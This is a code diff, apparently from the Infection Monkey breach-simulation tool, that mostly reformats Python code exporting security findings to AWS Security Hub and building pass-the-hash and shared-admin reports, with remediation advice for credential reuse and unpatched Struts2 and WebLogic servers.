recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB "
"protocol with user {2} and its password.".format(
issue['machine'],
issue['ip_address'],
issue['username']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -285,9 +297,13 @@ class AWSExporter(Exporter):
return AWSExporter._build_generic_finding(
severity=1,
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.",
recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format(
machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
"network.",
recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over "
"the WMI protocol with user {username} and its password.".format(
machine=issue['machine'],
ip_address=issue['ip_address'],
username=issue['username']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -298,10 +314,13 @@ class AWSExporter(Exporter):
return AWSExporter._build_generic_finding(
severity=1,
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
issue['username']),
recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over WMI protocol with user {username}".format(
machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
"network.".format(issue['username']),
recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a "
"pass-the-hash attack over WMI protocol with user {username}".format(
machine=issue['machine'],
ip_address=issue['ip_address'],
username=issue['username']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -325,9 +344,10 @@ class AWSExporter(Exporter):
return AWSExporter._build_generic_finding(
severity=1,
title="Shared local administrator account - Different machines have the same account as a local administrator.",
description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t an unintentional local admin sharing.",
recommendation="Here is a list of machines which the account {username} is defined as an administrator: {shared_machines}".format(
username=issue['username'], shared_machines=issue['shared_machines']),
description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t "
"an unintentional local admin sharing.",
recommendation="Here is a list of machines which the account {username} is defined as an administrator: "
"{shared_machines}".format(username=issue['username'], shared_machines=issue['shared_machines']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -339,8 +359,9 @@ class AWSExporter(Exporter):
severity=1,
title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.",
description="This critical machine is open to attacks via strong users with access to it.",
recommendation="The services: {services} have been found on the machine thus classifying it as a critical machine. These users has access to it:{threatening_users}.".format(
services=issue['services'], threatening_users=issue['threatening_users']),
recommendation="The services: {services} have been found on the machine thus classifying it as a critical "
"machine. These users has access to it:{threatening_users}.".format(
services=issue['services'], threatening_users=issue['threatening_users']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -353,8 +374,8 @@ class AWSExporter(Exporter):
title="Struts2 servers are vulnerable to remote code execution.",
description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
" The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser.".format(
machine=issue['machine'], ip_address=issue['ip_address']),
"The attack was made possible because the server is using an old version of Jakarta based file "
"upload Multipart parser.".format(machine=issue['machine'], ip_address=issue['ip_address']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -368,8 +389,8 @@ class AWSExporter(Exporter):
description="Install Oracle critical patch updates. Or update to the latest version. " \
"Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.",
recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
" The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format(
machine=issue['machine'], ip_address=issue['ip_address']),
"The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware "
"(subcomponent: WLS Security).".format(machine=issue['machine'], ip_address=issue['ip_address']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)

21
monkey/monkey_island/cc/services/reporting/pth_report.py
View File

@ -30,7 +30,6 @@ class PTHReportService(object):
}
"""
pipeline = [
{"$match": {
'NTLM_secret': {
@ -55,7 +54,7 @@ class PTHReportService(object):
:param admin_on_machines: A list of "monkey" documents "_id"s
:param domain_name: The admins' domain name
:return:
A list of formatted machines names *domain*\*hostname*, to use in shared admins issues.
A list of formatted machines names *domain*/*hostname*, to use in shared admins issues.
"""
machines = mongo.db.monkey.find({'_id': {'$in': admin_on_machines}}, {'hostname': 1})
return [domain_name + '\\' + i['hostname'] for i in list(machines)]
@ -108,7 +107,7 @@ class PTHReportService(object):
'username': user['name'],
'domain_name': user['domain_name'],
'hostname': NodeService.get_hostname_by_id(ObjectId(user['machine_id'])) if user['machine_id'] else None
} for user in doc['Docs']
} for user in doc['Docs']
]
users_cred_groups.append({'cred_groups': users_list})
@ -144,7 +143,8 @@ class PTHReportService(object):
{
'name': admin['name'],
'domain_name': admin['domain_name'],
'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'], admin['domain_name'])
'admin_on_machines': PTHReportService.__get_admin_on_machines_format(admin['admin_on_machines'],
admin['domain_name'])
} for admin in admins
]
@ -153,11 +153,11 @@ class PTHReportService(object):
admins_info = PTHReportService.get_shared_admins_nodes()
return [
{
'is_local': False,
'type': 'shared_admins_domain',
'machine': admin['domain_name'],
'username': admin['domain_name'] + '\\' + admin['name'],
'shared_machines': admin['admin_on_machines'],
'is_local': False,
'type': 'shared_admins_domain',
'machine': admin['domain_name'],
'username': admin['domain_name'] + '\\' + admin['name'],
'shared_machines': admin['admin_on_machines'],
}
for admin in admins_info]
@ -262,7 +262,7 @@ class PTHReportService(object):
return {
'nodes': PTHReportService.generate_map_nodes(),
'edges': PTHReportService.generate_edges()
}
}
@staticmethod
def get_report():
@ -283,4 +283,3 @@ class PTHReportService(object):
}
return report

11
monkey/monkey_island/cc/utils.py
View File

@ -65,11 +65,18 @@ def local_ip_addresses():
# The subnets list should not change often. Therefore, we can cache the result and never call this function
# more than once. This stopgap measure is here since this function is called a lot of times during the report
# generation.
# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted.
# This means that if the interfaces or subnets of the Island machine change, the Island process needs to be restarted.
@lru(maxsize=1)
def get_subnets():
subnets = []
for interface in interfaces():
addresses = ifaddresses(interface).get(AF_INET, [])
subnets.extend([ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network for link in addresses if link['addr'] != '127.0.0.1'])
subnets.extend(
[
ipaddress.ip_interface(link['addr'] + '/' + link['netmask']).network
for link
in addresses
if link['addr'] != '127.0.0.1'
]
)
return subnets